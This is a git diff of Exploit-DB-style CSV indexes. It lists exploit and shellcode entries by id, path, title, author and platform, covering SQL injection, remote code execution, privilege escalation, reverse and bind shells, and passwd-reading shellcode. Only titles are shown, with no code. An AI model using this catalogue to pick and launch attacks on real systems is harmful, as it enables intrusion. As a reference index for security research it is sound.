@@ -5914,8 +5914,8 @@ id,file,description,date,author,type,platform,port 44311,exploits/windows_x86-64/dos/44311.cpp,"Microsoft Windows Kernel - 'nt!NtWaitForDebugEvent' 64-bit Stack Memory Disclosure",2018-03-20,"Google Security Research",dos,windows_x86-64, 44312,exploits/windows/dos/44312.js,"Internet Explorer - 'RegExp.lastMatch' Memory Disclosure",2018-03-20,"Google Security Research",dos,windows, 44316,exploits/linux/dos/44316.py,"Kamailio 5.1.1 / 5.1.0 / 5.0.0 - Off-by-One Heap Overflow",2018-03-20,EnableSecurity,dos,linux,5060 -44326,exploits/android/dos/44326.py,"Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure",2018-03-23,QuarksLab,dos,android, -44327,exploits/android/dos/44327.py,"Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read",2018-03-23,QuarksLab,dos,android, +44326,exploits/android/dos/44326.py,"Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure",2018-03-23,QuarksLab,dos,android, +44327,exploits/android/dos/44327.py,"Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read",2018-03-23,QuarksLab,dos,android, 44332,exploits/linux/dos/44332.py,"Dell EMC NetWorker - Denial of Service",2018-03-23,"Marek Cybul",dos,linux, 44333,exploits/windows/dos/44333.py,"WM Recorder 16.8.1 - Denial of Service",2018-03-23,bzyo,dos,windows, 44338,exploits/windows/dos/44338.py,"Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service",2018-03-23,"Hashim Jawad",dos,windows, 
@@ -5964,7 +5964,7 @@ id,file,description,date,author,type,platform,port 44562,exploits/multiple/dos/44562.c,"Apple macOS/iOS - ReportCrash mach port Replacement due to Failure to Respect MIG Ownership Rules",2018-04-30,"Google Security Research",dos,multiple, 44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple, 44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows, -44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux, +44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux, 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows, 44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - '2345NetFirewall.sys' Denial of Service",2018-05-08,anhkgg,dos,windows_x86, 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows, 
@@ -5977,6 +5977,9 @@ id,file,description,date,author,type,platform,port 44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux, 44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows, 44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware, +44717,exploits/windows_x86/dos/44717.txt,"FTPShell Server 6.80 - Denial of Service",2018-05-23,"Hashim Jawad",dos,windows_x86, +44721,exploits/linux/dos/44721.py,"Siemens SCALANCE S613 - Remote Denial of Service",2018-05-23,t4rkd3vilz,dos,linux, +44724,exploits/android/dos/44724.txt,"Samsung Galaxy S7 Edge - Overflow in OMACP WbXml String Extension Processing",2018-05-23,"Google Security Research",dos,android, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -6817,7 +6820,7 @@ id,file,description,date,author,type,platform,port 9476,exploits/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,local,windows, 9477,exploits/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Local Privilege Escalation",2009-08-18,Zinx,local,android, 9479,exploits/linux/local/9479.c,"Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",local,linux, -9483,exploits/windows/local/9483.pl,"Photodex ProShow Gold 4 (Windows XP SP3) - '.psh' Universal Buffer Overflow (SEH)",2009-08-24,corelanc0d3r,local,windows, +9483,exploits/windows/local/9483.pl,"Photodex ProShow Gold 4 (Windows XP SP3) - '.psh' Universal Buffer Overflow (SEH)",2009-08-24,corelanc0d3r,local,windows, 9486,exploits/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer (SEH)",2009-08-24,hack4love,local,windows, 9488,exploits/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",local,freebsd, 9489,exploits/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Multiple Vulnerabilities",2009-08-24,kingcope,local,multiple, 
@@ -9648,7 +9651,7 @@ id,file,description,date,author,type,platform,port 44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware, 44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware, 44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware, -44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux, +44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux, 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux, 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware, 44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows, 
@@ -9667,8 +9670,8 @@ id,file,description,date,author,type,platform,port 44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux, 44282,exploits/hardware/local/44282.txt,"Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)",2018-03-10,qwertyoruiop,local,hardware, 44298,exploits/linux/local/44298.c,"Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation",2018-03-16,"Bruce Leidl",local,linux, -44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux, -44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux, +44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux, +44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux, 44302,exploits/linux/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux, 44303,exploits/linux/local/44303.c,"Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation",2017-12-11,anonymous,local,linux, 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware, 
@@ -9697,8 +9700,8 @@ id,file,description,date,author,type,platform,port 44455,exploits/windows/local/44455.py,"SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH)",2018-04-16,"Hashim Jawad",local,windows, 44470,exploits/windows/local/44470.py,"CloudMe Sync 1.11.0 - Local Buffer Overflow",2018-04-16,"Prasenjit Kanti Paul",local,windows, 44472,exploits/windows_x86/local/44472.py,"Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow PoC",2018-04-17,jollymongrel,local,windows_x86, -44474,exploits/windows/local/44474.txt,"Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, -44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, +44474,exploits/windows/local/44474.txt,"Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, +44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, 44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows, 44477,exploits/windows/local/44477.py,"Reaper 5.78 - Local Buffer Overflow",2018-04-17,bzyo,local,windows, 44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, 
@@ -9731,6 +9734,7 @@ id,file,description,date,author,type,platform,port 44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android, 44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, +44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -16467,7 +16471,7 @@ id,file,description,date,author,type,platform,port 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware, 44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware, 44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware, -44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows, +44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows, 44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux, 
@@ -16476,7 +16480,7 @@ id,file,description,date,author,type,platform,port
 44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
-44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
+44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
 44412,exploits/multiple/remote/44412.py,"Adobe Flash < 28.0.0.161 - Use-After-Free",2018-04-06,SyFi,remote,multiple,
 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
@@ -39259,7 +39263,7 @@ id,file,description,date,author,type,platform,port
 44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
 44430,exploits/xml/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,xml,
 44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux,
-44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
+44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
 44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC)",2018-04-09,ManhNho,webapps,php,
 44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
@@ -39270,10 +39274,10 @@ id,file,description,date,author,type,platform,port
 44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
-44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
-44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
+44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
+44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
 44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
-44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
+44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php,
 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80
 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp,
 44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php,
@@ -39370,7 +39374,7 @@ id,file,description,date,author,type,platform,port
 44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux,
 44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php,
-44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
+44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,
 44684,exploits/hardware/webapps/44684.txt,"Nordex N149/4.0-4.5 - SQL Injection",2018-05-22,t4rkd3vilz,webapps,hardware,
 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php,
 44687,exploits/linux/webapps/44687.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting",2018-05-22,t4rkd3vilz,webapps,linux,
@@ -39383,3 +39387,29 @@ id,file,description,date,author,type,platform,port
 44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php,
 44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php,
 44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php,
+44706,exploits/php/webapps/44706.txt,"EasyService Billing 1.0 - SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
+44707,exploits/php/webapps/44707.txt,"EasyService Billing 1.0 - 'p1' SQL Injection",2018-05-23,AkkuS,webapps,php,
+44708,exploits/php/webapps/44708.txt,"MySQL Smart Reports 1.0 - 'id' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
+44709,exploits/php/webapps/44709.txt,"MySQL Blob Uploader 1.7 - 'download.php' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
+44710,exploits/php/webapps/44710.txt,"MySQL Blob Uploader 1.7 - 'home-file-edit.php' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
+44711,exploits/php/webapps/44711.txt,"MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php,
+44712,exploits/php/webapps/44712.txt,"MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection",2018-05-23,AkkuS,webapps,php,
+44714,exploits/php/webapps/44714.txt,"PHP Dashboards 4.5 - 'email' SQL Injection",2018-05-23,AkkuS,webapps,php,
+44716,exploits/php/webapps/44716.txt,"Mobile Card Selling Platform 1 - Cross-Site Request Forgery",2018-05-23,L0RD,webapps,php,
+44715,exploits/php/webapps/44715.txt,"PHP Dashboards 4.5 - SQL Injection",2018-05-23,AkkuS,webapps,php,
+44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,
+44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,
+44720,exploits/php/webapps/44720.txt,"GPSTracker 1.0 - 'id' SQL Injection",2018-05-23,AkkuS,webapps,php,
+44722,exploits/php/webapps/44722.txt,"Shipping System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,
+44725,exploits/php/webapps/44725.txt,"Wecodex Store Paypal 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,
+44726,exploits/php/webapps/44726.txt,"SAT CFDI 3.3 - SQL Injection",2018-05-23,AkkuS,webapps,php,
+44727,exploits/php/webapps/44727.txt,"School Management System CMS 1.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php,
+44728,exploits/php/webapps/44728.txt,"Library CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,
+44729,exploits/php/webapps/44729.txt,"Wecodex Hotel CMS 1.0 - 'Admin Login' SQL Injection",2018-05-23,AkkuS,webapps,php,
+44730,exploits/php/webapps/44730.txt,"Wecodex Restaurant CMS 1.0 - 'Login' SQL Injection",2018-05-23,AkkuS,webapps,php,
+44732,exploits/php/webapps/44732.txt,"eWallet Online Payment Gateway 2 - Cross-Site Request Forgery",2018-05-23,L0RD,webapps,php,
+44733,exploits/php/webapps/44733.txt,"Mcard Mobile Card Selling Platform 1 - SQL Injection",2018-05-23,L0RD,webapps,php,
+44734,exploits/linux/webapps/44734.txt,"Honeywell Scada System - Information Disclosure",2018-05-23,t4rkd3vilz,webapps,linux,
+44735,exploits/php/webapps/44735.txt,"NewsBee CMS 1.4 - Cross-Site Request Forgery",2018-05-23,indoushka,webapps,php,
+44736,exploits/hardware/webapps/44736.txt,"SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change",2018-05-23,"Safak Aslan",webapps,hardware,
+44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index d78b9470c..04c7bf3cf 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1,33 +1,33 @@
 id,file,description,date,author,type,platform
 14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
 13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
-13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
+13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
 13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
-13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
+13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
 13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
 13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
-13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
-13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
+13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
+13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
 13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
 13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
-13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
+13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
-13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
+13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
 13257,shellcodes/bsdi_x86/13257.c,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
 13258,shellcodes/bsdi_x86/13258.c,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
 13261,shellcodes/freebsd/13261.c,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
-13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
+13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
 13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
 13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
-13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
+13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
 13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
 13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
